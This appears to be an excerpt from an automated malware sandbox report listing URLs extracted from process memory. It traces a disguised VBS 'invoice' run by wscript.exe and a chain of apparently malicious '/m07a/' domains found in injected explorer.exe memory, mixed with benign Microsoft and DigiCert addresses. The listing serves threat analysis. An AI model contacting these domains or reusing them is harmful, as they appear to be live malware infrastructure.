Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000006.00000002.2940547809.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2936778344.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1801712063.0000000008720000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000001.00000002.2217742539.000001DC40059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820058355.0000029F05781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apexu.xyz
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apexu.xyz/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apexu.xyz/m07a/www.nacob.top
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apexu.xyzReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.auralights.store
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.auralights.store/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.auralights.store/m07a/www.potentpolitics.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.auralights.storeReferer:
Source: explorer.exe, 00000006.00000002.2944714584.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C964000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.balancceer.top
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.balancceer.top/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.balancceer.top/m07a/www.auralights.store
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.balancceer.topReferer:
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lunazone.us
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lunazone.us/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lunazone.us/m07a/www.balancceer.top
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lunazone.usReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.matchuplover.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.matchuplover.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.matchuplover.com/m07a/www.qdaoxingsujiao.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.matchuplover.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msaway.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msaway.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msaway.com/m07a/www.shakishaskakes.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msaway.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nacob.top
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nacob.top/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nacob.top/m07a/www.matchuplover.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nacob.topReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.potentpolitics.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.potentpolitics.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.potentpolitics.com/m07a/www.welqi.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.potentpolitics.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.propertiesfinance.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.propertiesfinance.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.propertiesfinance.com/m07a/www.yipaijihejiaoyu.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.propertiesfinance.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qdaoxingsujiao.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qdaoxingsujiao.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qdaoxingsujiao.com/m07a/www.workproapi.site
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qdaoxingsujiao.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.royal-buttons.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.royal-buttons.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.royal-buttons.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shakishaskakes.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shakishaskakes.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shakishaskakes.com/m07a/www.xasvcd.xyz
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.shakishaskakes.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.welqi.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.welqi.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.welqi.com/m07a/www.propertiesfinance.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.welqi.comReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.workproapi.site
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.workproapi.site/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.workproapi.site/m07a/www.royal-buttons.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.workproapi.siteReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.xasvcd.xyz
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.xasvcd.xyz/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.xasvcd.xyz/m07a/www.lunazone.us
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.xasvcd.xyzReferer:
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yipaijihejiaoyu.com
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yipaijihejiaoyu.com/m07a/
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yipaijihejiaoyu.com/m07a/www.apexu.xyz
Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yipaijihejiaoyu.comReferer:
Source: explorer.exe, 00000006.00000002.2944714584.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: powershell.exe, 00000001.00000002.2217742539.000001DC3FFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.2217742539.000001DC4002C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820058355.0000029F05781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000006.00000000.1790977518.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2931305146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2932559264.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000000.1807070242.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000000.1807070242.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: wscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, Signed Proforma Invoice 3645479_pdf.vbs String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: wscript.exe, 00000000.00000002.1672124633.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfS
Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
